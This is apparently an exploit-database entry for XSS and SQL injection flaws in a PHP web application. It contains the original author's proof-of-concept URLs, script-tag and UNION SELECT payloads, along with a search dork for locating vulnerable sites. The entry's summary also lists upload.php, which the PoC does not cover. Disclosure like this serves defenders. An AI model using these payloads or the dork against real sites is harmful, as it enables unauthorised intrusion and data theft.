XSS and SQL Injection Vulnerabilities

vendor:

N/A

by:

kaozc9

7.5

CVSS

HIGH

Cross-Site Scripting (XSS) and SQL Injection

79 (XSS) and 89 (SQL Injection)

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

XSS and SQL Injection Vulnerabilities

The vulnerable files are search.php, uploads.php, file.php, cut.php and upload.php. An attacker can inject malicious JavaScript code in the search.php and uploads.php files via the ‘key’ and ‘p’ parameters respectively. Similarly, an attacker can inject malicious SQL code in the file.php, cut.php and upload.php files via the ‘id’ parameter.

Mitigation:

Input validation and output encoding should be used to prevent XSS and SQL Injection attacks.

Source

Exploit-DB raw data:

################################################################################################
# [+] Author : kaozc9                                                                          #
# [+] Email  : kaozc9@gmail.com                                                                #
# [+] Site   : www.paradisextem.co.cc                                                          #
# [+] Team   : ParadisexTeam                                                                   #
# [+] Dork   : Powered by Info Fisier.                                                         #
################################################################################################
#=========================================XSS==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#		http://server/path/search.php                                               #
#               http://server/path/uploads.php                                              #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/search.php?key=<script>alert(12345);</script>                      #
#     http://server/path/uploads.php?p=<script>alert(12345);</script>                       #
#=========================================SQL==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#		http://server/path/file.php                                                 #
#               http://server/path/cut.php                                                  #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/file.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11        #
#     http://server/path/cut.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11         #  
#                                                                                              #
################################################################################################